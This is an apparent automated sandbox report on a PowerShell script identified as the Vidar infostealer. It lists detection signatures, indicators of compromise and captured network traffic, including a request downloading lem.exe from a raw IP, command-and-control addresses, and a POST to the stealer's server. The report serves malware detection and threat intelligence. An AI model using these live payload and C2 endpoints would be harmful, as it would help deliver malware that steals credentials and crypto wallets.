Windows Analysis Report
script.ps1

Overview

General Information

Sample name:	script.ps1
Analysis ID:	1581165
MD5:	ce7cb570e0ee1888e5db713d85b84cdf
SHA1:	dd05628482d8e7e676a9d6904a6e1e52962e500f
SHA256:	a6c768da538be351bbfe32f5e454e08733592b09ce2d6b8a687e092ab85b6c69
Tags:	ps1user-lontze7
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Attempt to bypass Chrome Application-Bound Encryption

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Found API chain indicative of sandbox detection

Found many strings related to Crypto-Wallets (likely being stolen)

Loading BitLocker PowerShell Module

Powershell drops PE file

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to detect virtual machines (SLDT)

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Browser Started with Remote Debugging

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://5.252.155.64/lem.exe	Avira URL Cloud: Label: malware
Source: https://bijutr.shop/e3	Avira URL Cloud: Label: malware
Source: http://5.252.155.64/lem.exe;	Avira URL Cloud: Label: malware
Source: https://bijutr.shop/op	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000012.00000003.2351615242.00000000019D9000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.6% probability

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.4:49760 version: TLS 1.2

Source:	Binary string: cryptosetup.pdbGCTL source: Inf.com, 00000012.00000002.3022504782.0000000004CAC000.00000004.00000800.00020000.00000000.sdmp, Q9R1NG.18.dr
Source:	Binary string: cryptosetup.pdb source: Inf.com, 00000012.00000002.3022504782.0000000004CAC000.00000004.00000800.00020000.00000000.sdmp, Q9R1NG.18.dr

Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 5_2_00406301 FindFirstFileW,FindClose,	5_2_00406301
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 5_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	5_2_00406CC7
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0090DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	18_2_0090DC54
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0091A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	18_2_0091A087
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0091A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	18_2_0091A1E2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0090E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	18_2_0090E472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0091A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	18_2_0091A570
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_009166DC FindFirstFileW,FindNextFileW,FindClose,	18_2_009166DC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008DC622 FindFirstFileExW,	18_2_008DC622
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_009173D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	18_2_009173D4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_00917333 FindFirstFileW,FindClose,	18_2_00917333
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0090D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	18_2_0090D921

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 8MB later: 41MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:49781 -> 188.245.216.205:443
Source: Network traffic	Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49769 -> 188.245.216.205:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 188.245.216.205:443 -> 192.168.2.4:49781
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 188.245.216.205:443 -> 192.168.2.4:49786

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199809363512

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Dec 2024 05:37:25 GMTServer: Apache/2.4.58 (Ubuntu)Last-Modified: Fri, 27 Dec 2024 04:44:48 GMTETag: "136ffc-62a391f62da6d"Accept-Ranges: bytesContent-Length: 1273852Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 06 0e 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 b0 16 00 00 04 00 00 48 b8 13 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 da 98 06 00 00 00 00 00 00 00 00 00 9c 47 13 00 60 28 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 da 98 06 00 00 00 10 00 00 9a 06 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 a0 16 00 00 10 00 00 00 44 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: PARSONLINETehran-IRANIR PARSONLINETehran-IRANIR

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49730 -> 5.252.155.64:80

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_0091D889 InternetReadFile,SetEvent,GetLastError,SetEvent,

18_2_0091D889

Source: global traffic	HTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: bijutr.shopConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /lem.exe HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 5.252.155.64Connection: Keep-Alive

Source: chrome.exe, 00000015.00000003.2553200870.00000ED800F0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2553133305.00000ED800F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2553448830.00000ED8003B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000015.00000003.2553200870.00000ED800F0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2553133305.00000ED800F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2553448830.00000ED8003B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;

Source: global traffic	DNS traffic detected: DNS query: sAOREpcgcodbdSPJ.sAOREpcgcodbdSPJ
Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: bijutr.shop
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----U3WL6XBA1N7QIMYMGVS0User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: bijutr.shopContent-Length: 256Connection: Keep-AliveCache-Control: no-cache

Source: powershell.exe, 00000000.00000002.1942637880.000001D05390A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.2
Source: powershell.exe, 00000000.00000002.1942637880.000001D05390A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.25
Source: powershell.exe, 00000000.00000002.1942637880.000001D05390A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.252
Source: powershell.exe, 00000000.00000002.1942637880.000001D05390A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.252.
Source: powershell.exe, 00000000.00000002.1942637880.000001D05390A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.252.1
Source: powershell.exe, 00000000.00000002.1942637880.000001D05390A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.252.15
Source: powershell.exe, 00000000.00000002.1942637880.000001D05390A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.252.155
Source: powershell.exe, 00000000.00000002.1942637880.000001D05390A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.252.155.
Source: powershell.exe, 00000000.00000002.1942637880.000001D05390A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.252.155.6
Source: powershell.exe, 00000000.00000002.1942637880.000001D05390A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://5.252.155.64
